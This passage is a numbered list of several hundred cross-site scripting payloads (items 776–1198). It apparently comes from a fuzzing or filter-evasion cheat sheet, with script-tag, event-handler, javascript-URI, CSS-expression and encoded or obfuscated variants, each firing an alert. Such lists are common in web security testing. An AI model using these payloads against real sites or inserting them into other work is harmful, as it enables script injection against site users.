  776. %253cscript%253ealert(1073)%253c/script%253e
  777. “><s”%2b”cript>alert(1074)</script>
  778. “><ScRiPt>alert(1075)</script>
  779. “><<script>alert(1076);//<</script>
  780. foo<script>alert(1077)</script>
  781. <scr<script>ipt>alert(1078)</scr</script>ipt>
  782. ‘; alert(1080); var foo=’
  783. foo\’; alert(1081);//’;
  784. </script><script >alert(1082)</script>
  785. <img src=asdf onerror=alert(1083)>
  786. <BODY ONLOAD=alert(1084)>
  787. <script>alert(1085)</script>
  788. "><script>alert(1086))</script>
  789. <video src=1087 onerror=alert(1087)>
  790. <audio src=1088 onerror=alert(1088)>
  791. ';alert(1089))//';alert(1089))//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
  792. 0\"autofocus/onfocus=alert(1091)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  793. <IMG SRC="javascript:alert(1097);">
  794. <IMG SRC=javascript:alert(1098)>
  795. <IMG SRC=JaVaScRiPt:alert(1099)>
  796. <IMG SRC=javascript:alert(1100)>
  797. <IMG SRC=`javascript:alert(1101)`>
  798. <a onmouseover="alert(1102)">xxs link</a>
  799. <a onmouseover=alert(1103)>xxs link</a>
  800. <IMG """><SCRIPT>alert(1104)</SCRIPT>">
  801. <IMG SRC=javascript:alert(1105))>
  802. <IMG SRC=# onmouseover="alert(1106)">
  803. <IMG SRC= onmouseover="alert(1107)">
  804. <IMG onmouseover="alert(1108)">
  805. <IMG SRC=/ onerror="alert(1109))"></img>
  806. <IMG SRC="jav        ascript:alert(1115);">
  807. <IMG SRC="jav        ascript:alert(1116);">
  808. <IMG SRC="jav
  809. ascript:alert(1117);">
  810. <IMG SRC="jav
    ascript:alert(1118);">
  811. <IMG SRC=" &#14;  javascript:alert(1119);">
  812. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1121)>
  813. <<SCRIPT>alert(1123);//<</SCRIPT>
  814. <IMG SRC="javascript:alert(1126)"
  815. \";alert(1128);//
  816. </script><script>alert(1129);</script>
  817. </TITLE><SCRIPT>alert(1130);</SCRIPT>
  818. <INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
  819. <BODY BACKGROUND="javascript:alert(1132)">
  820. <IMG DYNSRC="javascript:alert(1133)">
  821. <IMG LOWSRC="javascript:alert(1134)">
  822. <STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
  823. <BODY ONLOAD=alert(1138)>
  824. <BGSOUND SRC="javascript:alert(1139);">
  825. <BR SIZE="&{alert(1140)}">
  826. <LINK REL="stylesheet" HREF="javascript:alert(1141);">
  827. <STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
  828. <IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
  829. xss:ex/*XSS*//*/*/pression(alert(1149))'>
  830. <STYLE TYPE="text/javascript">alert(1150);</STYLE>
  831. <STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
  832. <STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
  833. <XSS STYLE="xss:expression(alert(1153))">
  834. ¼script¾alert(1155)¼/script¾
  835. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
  836. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
  837. <IFRAME SRC="javascript:alert(1159);"></IFRAME>
  838. <IFRAME SRC=# onmouseover="alert(1160)"></IFRAME>
  839. <FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
  840. <TABLE BACKGROUND="javascript:alert(1162)">
  841. <TABLE><TD BACKGROUND="javascript:alert(1163)">
  842. <DIV STYLE="background-image: url(javascript:alert(1164))">
  843. <DIV STYLE="background-image: url(&#1;javascript:alert(1166))">
  844. <DIV STYLE="width: expression(alert(1167));">
  845. <!--[if gte IE 4]><SCRIPT>alert(1168);</SCRIPT><![endif]-->
  846. <BASE HREF="javascript:alert(1169);//">
  847. <? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
  848. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
  849. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1175);+ADw-/SCRIPT+AD4-
  850. 0\"autofocus/onfocus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  851. veris-->group<svg/onload=alert(1185)//
  852. #"><img src=M onerror=alert(1186);>
  853. element[attribute='<img src=x onerror=alert(1187);>
  854. [<blockquote cite="]">[" onmouseover="alert(1188);" ]
  855. <scr<script>ipt>alert(1195)</scr</script>ipt><scr<script>ipt>alert(1195)</scr</script>ipt>
  856. <sCR<script>iPt>alert(1196)</SCr</script>IPt>
  857. %253Cscript%253Ealert(1198)%253C%252Fscript%253E
  858. <IMG SRC=x onload="alert(1199))">
  859. <IMG SRC=x onafterprint="alert(1200))">
  860. <IMG SRC=x onbeforeprint="alert(1201))">
  861. <IMG SRC=x onbeforeunload="alert(1202))">
  862. <IMG SRC=x onerror="alert(1203))">
  863. <IMG SRC=x onhashchange="alert(1204))">
  864. <IMG SRC=x onload="alert(1205))">
  865. <IMG SRC=x onmessage="alert(1206))">
  866. <IMG SRC=x ononline="alert(1207))">
  867. <IMG SRC=x onoffline="alert(1208))">
  868. <IMG SRC=x onpagehide="alert(1209))">
  869. <IMG SRC=x onpageshow="alert(1210))">
  870. <IMG SRC=x onpopstate="alert(1211))">
  871. <IMG SRC=x onresize="alert(1212))">
  872. <IMG SRC=x onstorage="alert(1213))">
  873. <IMG SRC=x onunload="alert(1214))">
  874. <IMG SRC=x onblur="alert(1215))">
  875. <IMG SRC=x onchange="alert(1216))">
  876. <IMG SRC=x oncontextmenu="alert(1217))">
  877. <IMG SRC=x oninput="alert(1218))">
  878. <IMG SRC=x oninvalid="alert(1219))">
  879. <IMG SRC=x onreset="alert(1220))">
  880. <IMG SRC=x onsearch="alert(1221))">
  881. <IMG SRC=x onselect="alert(1222))">
  882. <IMG SRC=x onsubmit="alert(1223))">
  883. <IMG SRC=x onkeydown="alert(1224))">
  884. <IMG SRC=x onkeypress="alert(1225))">
  885. <IMG SRC=x onkeyup="alert(1226))">
  886. <IMG SRC=x onclick="alert(1227))">
  887. <IMG SRC=x ondblclick="alert(1228))">
  888. <IMG SRC=x onmousedown="alert(1229))">
  889. <IMG SRC=x onmousemove="alert(1230))">
  890. <IMG SRC=x onmouseout="alert(1231))">
  891. <IMG SRC=x onmouseover="alert(1232))">
  892. <IMG SRC=x onmouseup="alert(1233))">
  893. <IMG SRC=x onmousewheel="alert(1234))">
  894. <IMG SRC=x onwheel="alert(1235))">
  895. <IMG SRC=x ondrag="alert(1236))">
  896. <IMG SRC=x ondragend="alert(1237))">
  897. <IMG SRC=x ondragenter="alert(1238))">
  898. <IMG SRC=x ondragleave="alert(1239))">
  899. <IMG SRC=x ondragover="alert(1240))">
  900. <IMG SRC=x ondragstart="alert(1241))">
  901. <IMG SRC=x ondrop="alert(1242))">
  902. <IMG SRC=x onscroll="alert(1243))">
  903. <IMG SRC=x oncopy="alert(1244))">
  904. <IMG SRC=x oncut="alert(1245))">
  905. <IMG SRC=x onpaste="alert(1246))">
  906. <IMG SRC=x onabort="alert(1247))">
  907. <IMG SRC=x oncanplay="alert(1248))">
  908. <IMG SRC=x oncanplaythrough="alert(1249))">
  909. <IMG SRC=x oncuechange="alert(1250))">
  910. <IMG SRC=x ondurationchange="alert(1251))">
  911. <IMG SRC=x onemptied="alert(1252))">
  912. <IMG SRC=x onended="alert(1253))">
  913. <IMG SRC=x onerror="alert(1254))">
  914. <IMG SRC=x onloadeddata="alert(1255))">
  915. <IMG SRC=x onloadedmetadata="alert(1256))">
  916. <IMG SRC=x onloadstart="alert(1257))">
  917. <IMG SRC=x onpause="alert(1258))">
  918. <IMG SRC=x onplay="alert(1259))">
  919. <IMG SRC=x onplaying="alert(1260))">
  920. <IMG SRC=x onprogress="alert(1261))">
  921. <IMG SRC=x onratechange="alert(1262))">
  922. <IMG SRC=x onseeked="alert(1263))">
  923. <IMG SRC=x onseeking="alert(1264))">
  924. <IMG SRC=x onstalled="alert(1265))">
  925. <IMG SRC=x onsuspend="alert(1266))">
  926. <IMG SRC=x ontimeupdate="alert(1267))">
  927. <IMG SRC=x onvolumechange="alert(1268))">
  928. <IMG SRC=x onwaiting="alert(1269))">
  929. <IMG SRC=x onshow="alert(1270))">
  930. <IMG SRC=x ontoggle="alert(1271))">
  931. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
  932. <IMG SRC=x onload="alert(1273))">
  933. <INPUT TYPE="BUTTON" action="alert(1274)"/>
  934. "><h1><IFRAME SRC="javascript:alert(1275);"></IFRAME>">123</h1>
  935. "><h1><IFRAME SRC=# onmouseover="alert(1276)"></IFRAME>123</h1>
  936. <IFRAME SRC="javascript:alert(1277);"></IFRAME>
  937. <IFRAME SRC=# onmouseover="alert(1278)"></IFRAME>
  938. "><h1><IFRAME SRC=# onmouseover="alert(1279)"></IFRAME>123</h1>
  939. "></iframe><script>alert(1280);</script><iframe frameborder="0%EF%BB%BF
  940. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1281)"></IFRAME>123</h1>
  941. <IFRAME width="420" height="315" frameborder="0" onload="alert(1285)"></IFRAME>
  942. "><h1><IFRAME SRC="javascript:alert(1286);"></IFRAME>">123</h1>
  943. "><h1><IFRAME SRC=# onmouseover="alert(1287)"></IFRAME>123</h1>
  944. <IFRAME SRC="javascript:alert(1289);"></IFRAME>
  945. <IFRAME SRC=# onmouseover="alert(1290)"></IFRAME>
  946. <img src=``&NewLine; onerror=alert(1297)&NewLine;
  947. <script /**/>/**/alert(1301)/**/</script /**/
  948. <iframe/src="data:text/html,<svg &#130313031303;&#130313030;load=alert(1303)>">
  949. <meta content="&NewLine; 1304 &NewLine;; JAVASCRIPT&colon; alert(1304)" http-equiv="refresh"/>
  950. <form><iframe         ㌶&#13111311; src="javascript:alert(1311)"&#13111311;㌶        ;>
  951. http://www.google<script .com>alert(1313)</script
  952. <script ^__^>alert(1317))</script ^__^
  953. </style  ><script   :-(>/**/alert(1318)/**/</script   :-(
  954. &#00;</form><input type"date" onfocus="alert(1319)">
  955. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1323)&NewLine;>X</a>
  956. <script ~~~>alert(1324)</script ~~~>
  957. <iframe// src=javaSCRIPT&colon;alert(1332)
  958. <%<!--'%><script>alert(1349);</script -->
  959. <script src="data:text/javascript,alert(1350)"></script>
  960. <iframe/onreadystatechange=alert(1352)
  961. <svg/onload=alert(1353)
  962. <input type="text" value=`` <div/onmouseover='alert(1355)'>X</div>
  963. http://www.<script>alert(1356)</script .com
  964. <svg><script ?>alert(1358)
  965. <img src=`xx:xx`onerror=alert(1360)>
  966. <meta http-equiv="refresh" content="0;javascript&colon;alert(1362)"/>
  967. <script>+-+-1372-+-+alert(1372)</script>
  968. <body/onload=<!-->&#13730alert(1373)>
  969. <script itworksinallbrowsers>/*<script* */alert(1374)</script
  970. <img src ?itworksonchrome?\/onerror = alert(1375)
  971. <svg><script onlypossibleinopera:-)> alert(1377)
  972. <script x> alert(1379) </script 1379=2
  973. <div/onmouseover='alert(1380)'> style="x:">
  974. <--`<img/src=` onerror=alert(1381)> --!>
  975. <div style="position:absolute;top:0;left:0;width:138300%;height:138300%" onmouseover="prompt(1383)" onclick="alert(1383)">x</button>
  976. <form><button formaction=javascript&colon;alert(1385)>CLICKME
  977. <script\x20type="text/javascript">javascript:alert(1390);</script>
  978. <script\x3Etype="text/javascript">javascript:alert(1391);</script>
  979. <script\x0Dtype="text/javascript">javascript:alert(1392);</script>
  980. <script\x09type="text/javascript">javascript:alert(1393);</script>
  981. <script\x0Ctype="text/javascript">javascript:alert(1394);</script>
  982. <script\x2Ftype="text/javascript">javascript:alert(1395);</script>
  983. <script\x0Atype="text/javascript">javascript:alert(1396);</script>
  984. '`"><\x3Cscript>javascript:alert(1397)</script>
  985. '`"><\x00script>javascript:alert(1398)</script>
  986. <img src=1399 href=1399 onerror="javascript:alert(1399)"></img>
  987. <audio src=1400 href=1400 onerror="javascript:alert(1400)"></audio>
  988. <video src=1401 href=1401 onerror="javascript:alert(1401)"></video>
  989. <body src=1402 href=1402 onerror="javascript:alert(1402)"></body>
  990. <image src=1403 href=1403 onerror="javascript:alert(1403)"></image>
  991. <object src=1404 href=1404 onerror="javascript:alert(1404)"></object>
  992. <script src=1405 href=1405 onerror="javascript:alert(1405)"></script>
  993. <svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
  994. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
  995. <iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
  996. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
  997. <body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
  998. <frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
  999. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
  1000. <html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
  1001. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
  1002. <svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
  1003. <body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
  1004. <body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
  1005. <body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
  1006. <body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
  1007. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
  1008. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
  1009. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
  1010. <style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
  1011. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
  1012. <body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
  1013. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
  1014. <frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
  1015. <applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
  1016. <marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
  1017. <script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
  1018. <html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
  1019. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
  1020. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
  1021. <html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
  1022. <marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
  1023. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
  1024. <frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
  1025. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
  1026. <svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
  1027. <html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
  1028. <body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
  1029. <body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
  1030. <object onError object onError="javascript:javascript:alert(1443)"></object onError>
  1031. <body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
  1032. <html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
  1033. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
  1034. <body onpagehide body onpagehide="javascript:javascript:alert(1447)"></body onpagehide>
  1035. <svg onunload svg onunload="javascript:javascript:alert(1448)"></svg onunload>
  1036. <applet onerror applet onerror="javascript:javascript:alert(1449)"></applet onerror>
  1037. <body onkeyup body onkeyup="javascript:javascript:alert(1450)"></body onkeyup>
  1038. <body onunload body onunload="javascript:javascript:alert(1451)"></body onunload>
  1039. <iframe onload iframe onload="javascript:javascript:alert(1452)"></iframe onload>
  1040. <body onload body onload="javascript:javascript:alert(1453)"></body onload>
  1041. <html onmouseover html onmouseover="javascript:javascript:alert(1454)"></html onmouseover>
  1042. <object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
  1043. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1456)"></body onbeforeunload>
  1044. <body onfocus body onfocus="javascript:javascript:alert(1457)"></body onfocus>
  1045. <body onkeydown body onkeydown="javascript:javascript:alert(1458)"></body onkeydown>
  1046. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
  1047. <iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
  1048. <svg onload svg onload="javascript:javascript:alert(1461)"></svg onload>
  1049. <html onmousemove html onmousemove="javascript:javascript:alert(1462)"></html onmousemove>
  1050. <body onblur body onblur="javascript:javascript:alert(1463)"></body onblur>
  1051. \x3Cscript>javascript:alert(1464)</script>
  1052. '"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
  1053. <script>javascript:alert(1466)</script\x0D
  1054. <script>javascript:alert(1467)</script\x0A
  1055. <script>javascript:alert(1468)</script\x0B
  1056. <script charset="\x22>javascript:alert(1469)</script>
  1057. <!--\x3E<img src=xxx:x onerror=javascript:alert(1470)> -->
  1058. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1471)> -->
  1059. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1472)> -->
  1060. --><!-- --\x21473> <img src=xxx:x onerror=javascript:alert(1473)> -->
  1061. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1474)> -->
  1062. `"'><img src='#\x27 onerror=javascript:alert(1475)>
  1063. <a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
  1064. "'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
  1065. <a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
  1066. <a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
  1067. <a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
  1068. <a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
  1069. <a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
  1070. <a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
  1071. <a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
  1072. <a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
  1073. <a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
  1074. <a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
  1075. <a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
  1076. <a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
  1077. <a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
  1078. <a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
  1079. <script>/* *\x2A/javascript:alert(1492)// */</script>
  1080. <script>/* *\x00/javascript:alert(1493)// */</script>
  1081. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1494)//></style>
  1082. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1495)//></style>
  1083. <style></style\x09<img src="about:blank" onerror=javascript:alert(1496)//></style>
  1084. <style></style\x20<img src="about:blank" onerror=javascript:alert(1497)//></style>
  1085. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1498)//></style>
  1086. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1499);/*';">DEF
  1087. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
  1088. <script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
  1089. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
  1090. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
  1091. '`"><\x3Cscript>javascript:alert(1504)</script>
  1092. '`"><\x00script>javascript:alert(1505)</script>
  1093. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1506)>
  1094. "'`><\x00img src=xxx:x onerror=javascript:alert(1507)>
  1095. <script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
  1096. <script src="data:\xD4\x8F,javascript:alert(1509)"></script>
  1097. <script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
  1098. <script src="data:\xCB\x8F,javascript:alert(1511)"></script>
  1099. <script\x20type="text/javascript">javascript:alert(1512);</script>
  1100. <script\x3Etype="text/javascript">javascript:alert(1513);</script>
  1101. <script\x0Dtype="text/javascript">javascript:alert(1514);</script>
  1102. <script\x09type="text/javascript">javascript:alert(1515);</script>
  1103. <script\x0Ctype="text/javascript">javascript:alert(1516);</script>
  1104. <script\x2Ftype="text/javascript">javascript:alert(1517);</script>
  1105. <script\x0Atype="text/javascript">javascript:alert(1518);</script>
  1106. ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
  1107. ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
  1108. ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
  1109. ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
  1110. ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
  1111. ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
  1112. ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
  1113. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
  1114. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
  1115. ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
  1116. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
  1117. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
  1118. ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
  1119. ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
  1120. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
  1121. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
  1122. ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
  1123. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
  1124. ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
  1125. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
  1126. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
  1127. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
  1128. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
  1129. ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
  1130. ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
  1131. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
  1132. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
  1133. <a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
  1134. <a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
  1135. <a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
  1136. <a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
  1137. <a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
  1138. <a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
  1139. <a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
  1140. <a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
  1141. <a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
  1142. <a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
  1143. <a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
  1144. <a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
  1145. <a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
  1146. <a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
  1147. <a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
  1148. <a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
  1149. <a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
  1150. <a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
  1151. <a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
  1152. <a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
  1153. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
  1154. <a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
  1155. <a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
  1156. <a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
  1157. <a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
  1158. <a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
  1159. <a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
  1160. <a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
  1161. <a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
  1162. <a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
  1163. <a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
  1164. <a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
  1165. <a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
  1166. <a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
  1167. <a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
  1168. <a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
  1169. <a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
  1170. <a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
  1171. <a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
  1172. <a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
  1173. <a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
  1174. <a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
  1175. <a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
  1176. <a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
  1177. <a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
  1178. <a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
  1179. <a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
  1180. <a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
  1181. <a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
  1182. <a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
  1183. <a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
  1184. <a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
  1185. <a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
  1186. <a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
  1187. <a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
  1188. <a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
  1189. <a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
  1190. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1603)>
  1191. `"'><img src=xxx:x \x22onerror=javascript:alert(1604)>
  1192. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1605)>
  1193. `"'><img src=xxx:x \x0Donerror=javascript:alert(1606)>
  1194. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1607)>
  1195. `"'><img src=xxx:x \x09onerror=javascript:alert(1608)>
  1196. `"'><img src=xxx:x \x0Conerror=javascript:alert(1609)>
  1197. `"'><img src=xxx:x \x00onerror=javascript:alert(1610)>
  1198. `"'><img src=xxx:x \x27onerror=javascript:alert(1611)>
